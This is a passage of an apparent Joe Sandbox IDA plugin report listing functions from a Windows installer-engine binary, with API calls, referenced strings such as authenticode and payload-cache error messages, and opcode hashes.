API ID: CriticalSection$EnterLeave
String ID: Engine is active, cannot change engine state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$UX denied while trying to set download URL on embedded payload: %ls$UX did not provide container or payload id.$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
API String ID: 3168844106-2615595102
Opcode ID: b80e1b9ce4358629225fc7d7087612003180fb155a282a1ab3ec3f1300bc1289
Instruction ID: 57d51f4690374a3d298aff86f25f05404882496e4c4bf1678371ee62e7d6c50e
Opcode Fuzzy Hash: b80e1b9ce4358629225fc7d7087612003180fb155a282a1ab3ec3f1300bc1289
Instruction Fuzzy Hash: 3941D371E00A13ABDB61AEF5C805ABA77A8EF06711F158176FA04EB241DB34ED40C7A1

Function 000AA998 Relevance: 15.1, APIs: 2, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,000000FF,00AAC56B,?,000952B5,00000000,=S), ref: 000AAA90
GetLastError.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,00AAC56B,?,000952B5,00000000,=S), ref: 000AAAD4

Strings

Failed to get provider state from authenticode certificate., xrefs: 000AAABE
=S, xrefs: 000AA9A8
Failed to get signer chain from authenticode certificate., xrefs: 000AAB02
qSqS, xrefs: 000AA9B1
Failed to verify expected payload against actual certificate chain., xrefs: 000AAB1A
cache.cpp, xrefs: 000AAA66, 000AAAB4, 000AAAF8
Failed authenticode verification of payload: %ls, xrefs: 000AAA71
=S, xrefs: 000AA9AB

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLast
String ID: =S$=S$Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$cache.cpp$qSqS
API String ID: 1452528299-3199046776
Opcode ID: 48cbb49b9914282f45eef7646364cbb1373b074502fc9294ac4e72c9be6195dc
Instruction ID: f9714612ccd3d51929fee54ff5cca2334fe1734986b88e01b1dc08b0a6e3fa74
Opcode Fuzzy Hash: 48cbb49b9914282f45eef7646364cbb1373b074502fc9294ac4e72c9be6195dc
Instruction Fuzzy Hash: ED419671E00355ABEB109BE9DD45BEFBBE8EF09350F00012AFD05F7181D775990486A5

Function 000D5916 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,00000000,000000FF,?,00000000,00000000), ref: 000D5955
GetLastError.KERNEL32 ref: 000D5963
VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 000D59A4
GetLastError.KERNEL32 ref: 000D59B1
VirtualFree.KERNEL32(?,00000000,00008000), ref: 000D5B26
CloseHandle.KERNEL32(?), ref: 000D5B35

Strings

dlutil.cpp, xrefs: 000D5987
GET, xrefs: 000D5A58

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
String ID: GET$dlutil.cpp
API String ID: 2028584396-3303425918
Opcode ID: 13b057c422b7ad1d17114fe95f30fd701af52a34dbef87606849977241b9de01
Instruction ID: cb1f03c528ebb320eaa910ec4e2e989f424201b7b6600bd5cae2630420a79dfe
Opcode Fuzzy Hash: 13b057c422b7ad1d17114fe95f30fd701af52a34dbef87606849977241b9de01
Instruction Fuzzy Hash: 44616C71A00729ABDF11DFA8CC80BEEBBB9BF08361F11421AFD15A6350D77498409BA1

Function 000A0AAE Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 000A0E7E: CompareStringW.KERNEL32(00000000,00000000,feclient.dll,000000FF,00000000,000000FF,00000000,00000000,?,?,000A0ACD,?,00000000,?,00000000,00000000), ref: 000A0EAD

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,00000000,?,00000000,00000001,?,?,00000000,?,00000000), ref: 000A0C51
GetLastError.KERNEL32 ref: 000A0C5E

Strings

Failed to append payload cache action., xrefs: 000A0C08
Failed to create syncpoint event., xrefs: 000A0C8C
plan.cpp, xrefs: 000A0C82
Failed to append rollback cache action., xrefs: 000A0B2D
Failed to append cache action., xrefs: 000A0BA8
Failed to append package start action., xrefs: 000A0AF3

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CompareCreateErrorEventLastString
String ID: Failed to append cache action.$Failed to append package start action.$Failed to append payload cache action.$Failed to append rollback cache action.$Failed to create syncpoint event.$plan.cpp
API String ID: 801187047-2489563283
Opcode ID: 4154a56139f6e98245112c37730a6219fa066a7fd7c2e906a0be2eeba26b9293
Instruction ID: 4de536727153c18962101a30a712134442435e5c3b45811f01bcef28c64974d4
Opcode Fuzzy Hash: 4154a56139f6e98245112c37730a6219fa066a7fd7c2e906a0be2eeba26b9293
Instruction Fuzzy Hash: 93619F75600709EFDB05CFA8C980AAABBF9FF85350F21805AE8159B302DB31EE41DB50

Function 00099DB4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 147COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00099DDA
_MREFOpen@16.MSPDB140-MSVCRT ref: 00099DFF

Strings

MsiComponentSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 00099EF3
Failed to format component id string., xrefs: 00099DE5
Failed to get component path: %d, xrefs: 00099E63
Failed to format product code string., xrefs: 00099E0A
Failed to set variable., xrefs: 00099EE3

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Open@16
String ID: Failed to format component id string.$Failed to format product code string.$Failed to get component path: %d$Failed to set variable.$MsiComponentSearch failed: ID '%ls', HRESULT 0x%x
API String ID: 3613110473-1671347822
Opcode ID: b28d5b807c1edcafee3f2bb31aefb61ef6183ca889bd440828928bdb8f4b10fd
Instruction ID: eadcb9f583e1b62dd4c6819676b5854c02fb1f261f44ce7f78055d32a0a95e5b
Opcode Fuzzy Hash: b28d5b807c1edcafee3f2bb31aefb61ef6183ca889bd440828928bdb8f4b10fd
Instruction Fuzzy Hash: A141D872900215BACF75EAAC8C42BBEB6A8EF04310F244A1FF515E5291E7319E50B761

Function 000AD01A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 117threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,000AAB3C,?,00000000,00000000), ref: 000AD0B8
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 000AD0C4
CloseHandle.KERNEL32(00000000,00000000,?,?,000AC59C,00000001,?,?,?,?,?,00000000,00000000,?,?,?), ref: 000AD145

Strings

LD, xrefs: 000AD052, 000AD0E2, 000AD0F7
^S, xrefs: 000AD070
Failed to create elevated cache thread., xrefs: 000AD0F2
elevation.cpp, xrefs: 000AD0E8
Failed to pump messages in child process., xrefs: 000AD11C

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorHandleLastThread
String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$LD$^S$elevation.cpp
API String ID: 747004058-740856302
Opcode ID: 45e2974ed6e557e80127c184a7f51454d2db26b6a71561f2fd72ad9236ccf992
Instruction ID: 5268dc8dfc623b7828693e64aa046d62c1a9f6c84a132ab2983fe28916829ec0
Opcode Fuzzy Hash: 45e2974ed6e557e80127c184a7f51454d2db26b6a71561f2fd72ad9236ccf992
Instruction Fuzzy Hash: 2C41D1B5E01219AFDB01DFA9D8859EEBBF8EF49310F10412AFD09E7341D774A9418BA4

Function 000A473A Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 115fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,?,00000008,?,00000000,?,00000000,00000000,?,00000000,@G,?,?,00000000,?,00000000), ref: 000A4765
GetLastError.KERNEL32 ref: 000A4772
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 000A481B
GetLastError.KERNEL32 ref: 000A4825

Strings

Failed to read data for message., xrefs: 000A4853
Failed to read message from pipe., xrefs: 000A47F0
Failed to allocate data for message., xrefs: 000A47D9
pipe.cpp, xrefs: 000A47CF, 000A47E6, 000A4849

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$pipe.cpp
API String ID: 1948546556-3912962418
Opcode ID: 3aba5d6fe38e6fbe320de89714e8f9d1e45a64bc9f6586b62cb85ce6f972ffbd
Instruction ID: 63e3eb73e4f28a155d03f9fb50f24dd53f025b584eadd05a7c4e7f03abf6d984
Opcode Fuzzy Hash: 3aba5d6fe38e6fbe320de89714e8f9d1e45a64bc9f6586b62cb85ce6f972ffbd
Instruction Fuzzy Hash: DD310975A44365BBEB209EE5DC45BAEF7A8EF42711F108126F900E6181DBB4DE008BE1

Function 0009F2DC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 109stringCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 0009F315

Part of subcall function 00094013: CreateDirectoryW.KERNELBASE(0009533D,000953B5,00000000,00000000,?,000A9EE4,00000000,00000000,0009533D,00000000,000952B5,00000000,?,=S,0009D4AC,=S), ref: 00094021
Part of subcall function 00094013: GetLastError.KERNEL32(?,000A9EE4,00000000,00000000,0009533D,00000000,000952B5,00000000,?,=S,0009D4AC,=S,00000000,00000000), ref: 0009402F

lstrlenA.KERNEL32(000DB4F0,00000000,00000094,00000000,00000094,?,?,000A0328,swidtag,00000094,?,000DB508,000A0328,00000000,?,00000000), ref: 0009F368

Part of subcall function 000D4C67: CreateFileW.KERNEL32(000DB4F0,40000000,00000001,00000000,00000002,00000080,00000000,000A0328,00000000,?,0009F37F,?,00000080,000DB4F0,00000000), ref: 000D4C7F
Part of subcall function 000D4C67: GetLastError.KERNEL32(?,0009F37F,?,00000080,000DB4F0,00000000,?,000A0328,?,00000094,?,?,?,?,?,00000000), ref: 000D4C8C

Strings

swidtag, xrefs: 0009F328
Failed to write tag xml to file: %ls, xrefs: 0009F3A6
Failed to allocate regid folder path., xrefs: 0009F3C7
Failed to create regid folder: %ls, xrefs: 0009F3B0
Failed to allocate regid file path., xrefs: 0009F3C0
Failed to format tag folder path., xrefs: 0009F3CE

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CreateErrorLast$DirectoryFileOpen@16lstrlen
String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$swidtag
API String ID: 904508749-1201533908
Opcode ID: 09935c03add726dafb011d3482201540f14e8a5ce3a7a529c38feff55474f95a
Instruction ID: 06e5fbf04146f279c8944a668440645962695bc66c4fffb33adf68f678d7b837
Opcode Fuzzy Hash: 09935c03add726dafb011d3482201540f14e8a5ce3a7a529c38feff55474f95a
Instruction Fuzzy Hash: 56316C32D0121ABFCF219AA5DC42BEDBBB5AF04710F108176FA14FA251D7799E50AB90

Function 000A51E9 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 90synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0002BF20,?,F0000003,00000000,00000000,?,00000000,00000000,00000000,00095386,00000000,00000000,?,00000000), ref: 000A5292
GetLastError.KERNEL32(?,?,?,00094B5B,?,?,00000000,?,?,?,?,?,?,000DB490,?,?), ref: 000A529D

Strings

Failed to write exit code to message buffer., xrefs: 000A520D
Failed to write restart to message buffer., xrefs: 000A5235
Failed to wait for child process exit., xrefs: 000A52CB
Failed to post terminate message to child process cache thread., xrefs: 000A5261
Failed to post terminate message to child process., xrefs: 000A527D
pipe.cpp, xrefs: 000A52C1

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLastObjectSingleWait
String ID: Failed to post terminate message to child process cache thread.$Failed to post terminate message to child process.$Failed to wait for child process exit.$Failed to write exit code to message buffer.$Failed to write restart to message buffer.$pipe.cpp
API String ID: 1211598281-2161881128
Opcode ID: a916a023db1c942948612483b9aabad6e07b14cee9db7294d6233cf8c955effe
Instruction ID: c4a41902434f243b835a7ad02b5133d3867db30dee82d6febc2b0348eea49819
Opcode Fuzzy Hash: a916a023db1c942948612483b9aabad6e07b14cee9db7294d6233cf8c955effe
Instruction Fuzzy Hash: F821C133941B29BBDB125AE59C01BDEBBA8FB02322F110316F900B6191D7359E5097E0

Function 000A8E92 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 88fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000101,?,000A9CFF,00000003,000007D0,00000003,?,000007D0), ref: 000A8EAC
GetLastError.KERNEL32(?,000A9CFF,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000000,-00000004), ref: 000A8EB9
CloseHandle.KERNEL32(00000000,?,000A9CFF,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000000), ref: 000A8F80

Strings

Failed to open payload at path: %ls, xrefs: 000A8EFC
Failed to verify hash of payload: %ls, xrefs: 000A8F6B
Failed to verify signature of payload: %ls, xrefs: 000A8F28
Failed to verify catalog signature of payload: %ls, xrefs: 000A8F47
cache.cpp, xrefs: 000A8EEF

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
API String ID: 2528220319-2757871984
Opcode ID: 03f255c68f8d9733c9269e5ee3834dab099b346d56cdf1f8c54804ef9d9ecc6f
Instruction ID: 7dce38571b9113759769d7001169cf5b49ba18b3589b9ce2099b4c06e303e36a
Opcode Fuzzy Hash: 03f255c68f8d9733c9269e5ee3834dab099b346d56cdf1f8c54804ef9d9ecc6f
Instruction Fuzzy Hash: E9212732A00622BED7222AF48C49B9F7B56BF02760F148225FD14792A1DB359C60DBD1

Function 000969B8 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00096A03
GetLastError.KERNEL32 ref: 00096A0D
GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 00096A51
GetLastError.KERNEL32 ref: 00096A5B

Strings

variable.cpp, xrefs: 00096A31, 00096A7F
Failed to get windows directory., xrefs: 00096A3B
Failed to get volume path name., xrefs: 00096A89
Failed to set variant value., xrefs: 00096AA5

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLast$DirectoryNamePathVolumeWindows
String ID: Failed to get volume path name.$Failed to get windows directory.$Failed to set variant value.$variable.cpp
API String ID: 124030351-4026719079
Opcode ID: 340a57606ef4130b7120da49ec119be037c9cfa3951c07e0d15f2db95dcfcd6a
Instruction ID: de9c00f05a5341d7079bcc34f601e11e648cfac1150d18470afeb78b80951583
Opcode Fuzzy Hash: 340a57606ef4130b7120da49ec119be037c9cfa3951c07e0d15f2db95dcfcd6a
Instruction Fuzzy Hash: 6821C972F41325AAEB20A6A99C45FDB73EC9F40710F014167FE05F7181EA359D409AB5

Function 00099B3F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 86COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00099B5A
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 00099B72
GetLastError.KERNEL32 ref: 00099B81

Strings

File search: %ls, did not find path: %ls, xrefs: 00099BD5
Failed to set variable., xrefs: 00099C07
Failed get to file attributes. '%ls', xrefs: 00099BC0
Failed to format variable string., xrefs: 00099B65
search.cpp, xrefs: 00099BB3

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed get to file attributes. '%ls'$Failed to format variable string.$Failed to set variable.$File search: %ls, did not find path: %ls$search.cpp
API String ID: 1811509786-2053429945
Opcode ID: 473c0a04d277e17855f722dc6a27fd03ae06dbadf8671fbb8db41746dec9ddc8
Instruction ID: 28722783627e90ecf5cc1322dcd351411902620d19eaed2a7ba3ca5b074ba83b
Opcode Fuzzy Hash: 473c0a04d277e17855f722dc6a27fd03ae06dbadf8671fbb8db41746dec9ddc8
Instruction Fuzzy Hash: 1C210B32E40314BBDF116AA8DE42BAEB7A9EF15310F10421BFD04A5291E7719D50E7F1

Function 000AAB3C Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,?), ref: 000AAB53
GetLastError.KERNEL32 ref: 000AAB5D
CoInitializeEx.OLE32(00000000,00000000), ref: 000AAB9C
CoUninitialize.OLE32(?,000AC4F4,?,?), ref: 000AABD9

Strings

Failed to initialize COM., xrefs: 000AABA8
Failed to set elevated cache pipe into thread local storage for logging., xrefs: 000AAB8B
elevation.cpp, xrefs: 000AAB81
Failed to pump messages in child process., xrefs: 000AABC7

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorInitializeLastUninitializeValue
String ID: Failed to initialize COM.$Failed to pump messages in child process.$Failed to set elevated cache pipe into thread local storage for logging.$elevation.cpp
API String ID: 876858697-113251691
Opcode ID: 1050d0ba2eea272339b7328ca781b1c477bfbfe6138448793874493054eff3ad
Instruction ID: cfd69fc5ce162d1ad11bc0b6265efa2624463ad1144c3a49f76006bf7646e499
Opcode Fuzzy Hash: 1050d0ba2eea272339b7328ca781b1c477bfbfe6138448793874493054eff3ad
Instruction Fuzzy Hash: 66110632A11331BFA72117AADC05D9FBB98EF06B60B024117FD04B7291EB659D00D6F5

Function 00095BF0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 54registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000D0E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,000D5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 000D0E52

RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00095C77

Strings

ProgramFilesDir, xrefs: 00095BF8
SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 00095C14
Failed to ensure path was backslash terminated., xrefs: 00095C61
Failed to open Windows folder key., xrefs: 00095C29
CommonFilesDir, xrefs: 00095C03, 00095C33, 00095C42
Failed to read folder path for '%ls'., xrefs: 00095C43
+, xrefs: 00095BFD

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseOpen
String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
API String ID: 47109696-3209209246
Opcode ID: c54d102c8042d905026d6aa2b2098128212043c0290c21dc4f31d0cae2d423ec
Instruction ID: e5347ff862101d6da34f860b0ba5fe4de5735d46027b1e34e1fd856992a34da5
Opcode Fuzzy Hash: c54d102c8042d905026d6aa2b2098128212043c0290c21dc4f31d0cae2d423ec
Instruction Fuzzy Hash: 4801D232A41728FBCF226A56DD02E9EBBA8DB00721F118167F904BA301D7719E00A2A1

Function 000BA024 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 172COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,?,00000001,00000000,?), ref: 000BA0F1
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 000BA0FB

Strings

download, xrefs: 000BA0BB
:, xrefs: 000BA174
Failed attempt to download URL: '%ls' to: '%ls', xrefs: 000BA1D8
apply.cpp, xrefs: 000BA11F
Failed to clear readonly bit on payload destination path: %ls, xrefs: 000BA12A

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: :$Failed attempt to download URL: '%ls' to: '%ls'$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$download
API String ID: 1799206407-1905830404
Opcode ID: 426d2b5fb83aa5ab7b41826f25f5c1183eb900b81cdb474a2544cce2a4f44e5c
Instruction ID: e9416ab0304c17780835574176f161b9859b6895924622fb631046b4953ed826
Opcode Fuzzy Hash: 426d2b5fb83aa5ab7b41826f25f5c1183eb900b81cdb474a2544cce2a4f44e5c
Instruction Fuzzy Hash: 4251AE71A00209AFDB51EFA9C840AEFB7F5EF05710F10845AE905EB251E335EE41CBA2

Function 000D6DA8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 159COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,74DEDFD0,000000FF,type,000000FF,?,74DEDFD0,74DEDFD0,74DEDFD0), ref: 000D6DFE
SysFreeString.OLEAUT32(00000000), ref: 000D6E49
SysFreeString.OLEAUT32(00000000), ref: 000D6EC5
SysFreeString.OLEAUT32(00000000), ref: 000D6F11

Strings

type, xrefs: 000D6DF0
url, xrefs: 000D6E11

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
